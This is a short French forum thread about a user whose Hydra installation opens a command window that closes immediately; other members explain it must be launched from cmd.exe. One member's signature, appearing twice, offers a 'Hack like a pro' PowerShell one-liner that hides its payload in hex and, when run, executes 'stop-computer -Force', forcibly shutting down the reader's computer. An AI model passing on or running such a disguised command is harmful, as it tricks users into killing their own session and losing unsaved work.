Annonce

Réduire
Aucune annonce.

probleme ouvrir hydra

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • probleme ouvrir hydra

    salut a tous

    j'ai essayé de telecharger hydra , il est visible dans mes programmes mais quand je clique dessus cmd s'ouvre puis se referme tout de suite

  • #2
    Salut,

    T'as surement chopé un virus de l'internet.

    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Hello ! pourrait tu nous donner plus de détails ? comment l'as tu installé , des messages d'erreur pendant l'installation ? D'autres indications ? Plus tu trouveras d'informations a nous fournir , plus tu auras de chance qu'on puisse t'aider As tu fait un tour du coté des FAQ http://hydra-software.net/faq/ , As tu recherché dans l'aide grâce a la commande hydra -h , As tu compulsé le manuel grâce a la commande man hydra ?

      Aussi qu'essaye tu de faire ! quelle est la commande que tu a tenté de lancer ?


      BLEND
      Dernière modification par blend, 16 juillet 2018, 19h17.

      Commentaire


      • #4
        Nan mais en vrai t'embête pas Blend.
        Lex33 t'es sous windows, tu dois lancer cmd.exe puis lancer hydra depuis l'invite de commande.
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Krisscoolblend Ok merci j’ai réussi

          Commentaire


          • #6
            Je l’ai installé avec un tuto sur YouTube , je n’ai eu aucun message d’erreur

            Commentaire

            Chargement...
            X